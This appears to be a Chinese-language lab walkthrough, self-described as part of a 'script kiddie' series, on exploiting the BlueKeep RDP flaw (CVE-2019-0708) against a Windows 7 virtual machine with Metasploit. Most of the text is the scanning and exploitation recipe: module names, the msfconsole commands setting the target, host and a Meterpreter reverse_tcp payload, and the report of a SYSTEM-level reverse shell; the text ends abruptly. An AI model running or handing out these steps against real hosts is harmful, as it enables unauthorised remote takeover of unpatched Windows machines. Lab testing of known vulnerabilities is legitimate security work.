CVE-2019-0708 RDP远程桌面漏洞测试
**脚本小子的狂喜系列**
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,对于windows用户远程桌面图形化连接是很必要的,不论是公网尤其是内网,若系统不修复相关补丁,危害性可想而知。
实验环境:
Kali的2020年1月版中msf框架已经集成了cve20190708的相关脚本
其中:auxiliary/scanner/rdp/cve_2019_0708_bluekeep为检测模块
exploit/windows/rdp/cve_2019_0708_bluekeep_rce为渗透模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
目标主机为windows7系统,系统信息如图
同时开启我们的远程桌面功能,启动3389端口
模块测试
nmap 扫描目标主机端口,3389端口开放
配置扫描模块后运行,可见目标是存在漏洞的
使用渗透模块,配置相关选项
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 目标IP
rhosts => 192.168.1.2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload 设置使用的payload
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
target选项是需要配置的,默认0自动选择目标系统时会报错,show targets查看
模块为不同的主机有预设,我测试虚拟机装的是VMware15,但我这里选择了1就可
启动渗透模块,约半分钟获取反弹shell
我测试了几次也没有出现目标蓝屏的情况
shell的权限为system系统权限
TCP连接建立
[1]: